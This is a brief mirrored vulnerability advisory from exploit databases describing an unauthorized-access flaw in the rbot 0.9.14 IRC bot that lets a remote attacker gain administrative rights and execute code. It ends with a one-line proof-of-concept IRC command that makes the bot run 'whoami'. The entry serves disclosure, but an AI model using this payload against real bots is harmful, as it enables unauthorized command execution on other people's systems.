rbot 0.9.14 – ‘!react’ Unauthorized Access

  • 作者: nks
    日期: 2010-02-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33935/
  • source: https://www.securityfocus.com/bid/39915/info
    
    Rbot is prone to an unauthorized-access vulnerability because it fails to adequately sanitize user supplied data.
    
    An attacker can exploit this vulnerability to gain administrative rights to the rbot application. This will allow a remote attacker to execute Ruby code within the context of the affected application; other attacks may be possible.
    
    rbot 0.9.14 is vulnerable; other versions may also be affected. 
    
    <attacker> !react to /attacker:.*/ with cmd:whoami